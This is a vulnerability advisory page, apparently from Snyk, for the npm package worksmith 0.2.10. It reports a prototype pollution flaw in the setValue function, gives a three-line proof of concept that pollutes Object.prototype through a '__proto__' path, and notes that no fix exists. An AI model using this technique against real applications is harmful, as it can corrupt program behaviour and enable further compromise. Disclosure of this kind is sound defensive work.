worksmith@0.2.10 vulnerabilities

A purely functional workflow engine

Direct Vulnerabilities

Known vulnerabilities in the worksmith package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free
VulnerabilityVulnerable Version
  • H
Prototype Pollution

worksmith is an A purely functional workflow engine

Affected versions of this package are vulnerable to Prototype Pollution via the setValue function.

POC

const worksmith = require('worksmith'); 
worksmith.setValue({}, '__proto__.polluted', true); 
console.log(polluted); // true

How to fix Prototype Pollution?

There is no fixed version for worksmith.

*